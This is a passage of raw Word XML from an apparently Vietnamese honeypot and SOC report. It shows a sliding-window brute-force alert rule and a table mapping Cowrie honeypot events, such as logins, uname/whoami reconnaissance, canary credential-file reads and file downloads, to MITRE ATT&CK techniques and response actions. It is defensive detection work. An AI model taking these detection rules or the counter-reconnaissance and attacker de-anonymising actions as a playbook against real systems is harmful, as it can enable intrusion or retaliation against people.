      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018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2: Loại bỏ toàn bộ các mốc thời gian đã trượt ra ngoài cửa sổ thời gian: L' = {t ∈ L | t_now - t ≤ W}.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018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3: Thêm t_now vào L'. Nếu kích thước |L'| ≥ T, lập tức kích hoạt Cảnh báo Tấn công Dò quét Mật khẩu diện rộng (MITRE T1110.001) và xóa danh sách L' để ngăn chặn hiện tượng spam cảnh báo liên tục.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018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Bên cạnh đó, Correlation Engine tự động phân loại các sự kiện đặc biệt khác và ánh xạ vào ma trận MITRE ATT&amp;CK được mô tả chi tiết trong Bảng 3.1 dưới đây:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000187">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3.1: Bảng ánh xạ các Sự kiện Cowrie sang Ma trận Kỹ thuật MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table8"/>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1881"/>
        <w:gridCol w:w="1881"/>
        <w:gridCol w:w="1881"/>
        <w:gridCol w:w="1881"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1881"/>
            <w:gridCol w:w="1881"/>
            <w:gridCol w:w="1881"/>
            <w:gridCol w:w="1881"/>
            <w:gridCol w:w="1881"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f497d" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000188">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Mã Sự kiện Cowrie</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f497d" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000189">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Kỹ thuật MITRE ATT&amp;CK</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f497d" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Tên Kỹ thuật Chuẩn</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f497d" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Mức độ Nguy hại</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f497d" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018C">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Hành động SOAR Khuyến nghị</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">cowrie.login.failed (đạt ngưỡng)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018E">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">T1110.001</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018F">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Brute Force: Password Guessing</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000190">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">HIGH</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000191">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Tarpit giam lỏng + Chặn Firewall</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92">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">cowrie.login.success</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000193">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">T1078</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000194">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Valid Accounts: Initial Access</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000195">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000196">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Trinh sát ngược tức thì + Kích hoạt bẫy</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000197">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">cowrie.command.input (uname, whoami)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000198">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">T1082</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000199">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">System Information Discovery</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019A">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">MEDIUM</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Ghi nhật ký telemetry + Giám sát phiên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9C">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">cowrie.command.input (đọc canary file)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019D">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">T1552.001</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019E">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Unsecured Credentials In Files</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019F">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A0">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Khử ẩn danh Real IP + Cô lập phiên</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A1">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">cowrie.session.file_download</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A2">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">T1105</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
